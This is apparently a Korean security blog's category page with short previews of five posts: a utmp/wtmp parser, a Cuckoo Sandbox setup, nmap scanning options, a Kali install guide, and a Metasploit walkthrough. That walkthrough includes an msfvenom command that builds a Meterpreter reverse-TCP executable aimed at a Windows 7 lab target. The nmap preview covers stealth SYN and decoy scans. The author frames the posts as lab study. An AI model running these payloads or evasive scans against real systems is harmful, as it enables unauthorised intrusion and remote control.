목록Tool (5)
삽이 부서질 때까지 삽질
어쩌다 계기가 되서 utmp, wtmp parser를 만들어 봤는데요.윈도우에서 작동하도록 제작했어요. 이 파서는 uinx나 linux에서 사용자 계정 접속이나 로그아웃 등의 기록을 볼 수 있도록 해주는거에요. 로그 경로 utmp /var/run/utmp wmp /var/log/wtmp utmp는 w 명령어로 확인가능하며 현재 접속한 리스트를 바이너리 형태로 저장하고 있고,wtmp는 last 명령어로 확인가능하며 지금까지 접속한 모든 기록을 바이너리 형태로 저장하고 있어요. 이렇게 말이죠 ㅎㅎ 이걸 아래처럼 보여주도록 제작했어요. 사용법은 간단하게 파일명만 주면 알아서 파싱해요.불편점이나 개선점이 있으시면 덧글로 남겨주세요.[코드 수정도 환영이에요!!]수정해서 올릴게요!! utmp5 기준으로 작성되서 버..
쿠쿠 샌드 박스 구축 해놓은 서버가 있었는데 안돌아가서 다시 구축했는데 ... 시간이 좀 걸린... 눙물...제가 구축한 버전은 쿠쿠샌드 박스 1.2 버전이고 현재 최신 버전은 2.0 버전입니다.2.0으로 안한 이유는 단지 귀찮아서?...나중에 새롭게 해야죠... 먼저 필요한 라이브러리 및 실행 파일들을 설치합시다. $ sudo apt-get install python-dev libtool byacc flex bison git automake python-pip mongodb libfuzzy-dev libvirt-dev tcpdump subversion virtualbox vim curl python-lxml 그리고 야라 3.3.0 버전을 설치!!하려면 다운을 받아야겠죠. $ wget https://gi..
nmap은 사이트에 실행해보면 바로 해킹으로 간주해서 은팔찌입니다.자기 스스로 환경 구축해서 실험하세요. 포트 스캔을 통해서 정보를 수집해보겠습니다. nmap -sP [ip]ping을 사용하여 대상 호스트가 살아있는지 확인 nmap -O [ip]IP의 운영체제를 확인합니다. nmap -sS [IP]스텔스 스캔을 합니다. 이 방식은 3 way handshaking 을 완료하지 않고 syn을 보내고 syn/ack 이 오면 rst를 보내 호스트 open 을 판단하여 로그를 남기지 않으려고 연결을 중단시키는 옵션입니다. nmap -D RND:[num] [IP]num 만큼 랜덤한 ip를 생성하여 패킷을 전송합니다. 상대방에게 가짜 ip를 섞어서 보냄으로 분석하기 힘들게 합니다. -D 옵션 사용 전 -D 옵션 사용..
메타스플로잇을 공부하면서 이것저것 해보는데 정리할 겸 글을 쓰면서 할게요.해당 글을 보시고 제작하여 공격하시면 안됩니다.공격해서 은팔찌 차면... 어디까지나 공부 목적으로 하세요. 타겟은 window 7 x64 입니다 먼저 자신의 내부 IP 주소를 확인 합니다.그래야 제것과 타겟을 연결하겠죠?? msfvenom을 사용해서 제작할거라 먼저 목록을 봅니다. 타겟은 windows 이기 때문에 다른 것을 안보려고 grep으로 windows 만 잡았습니다. msfvenom -l 드디어 msfvenom을 이용해서 제작을 합니다. msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.182.138 lport=4444 -f exe > /root/Desktop/w..
메타스플로잇을 사용하게되서 칼리를 설치했는데 이왕하는거 글을 쓰려고 해요. vm에서 그래픽 인스톨을 하면 정말 쉽기 때문에 필요 없을 거같지만 가끔 너무 다음만 눌르면 잘못 설치하게 되죠... 그래서 주의할 점 3가지와 설치 영상을 준비했습니다. 1.자동 설치가 아닌 수동 설치를 하여 우분투가 아닌 데비안 계열로 설치한다. 2. 파티션 디스크 설정할 때 디스크를 변경하겠나? 라는 물음에 No가 아닌 Yes 로 3. GRUB 부트 로더를 설정할 때 /dev/sda 로 설정할 것! 위 3가지만 조심하시고 설치하시면 정상적으로 칼리가 설치 되실 겁니다. 칼리 다운로드 하러가기 영상에서는 4프로세스에 램4기가 용량 90기가를 주었는데 굳이 이렇게 안하시고 사용하실큼만 설정하시면 됩니다~ 중간 중간 바로 바로 넘..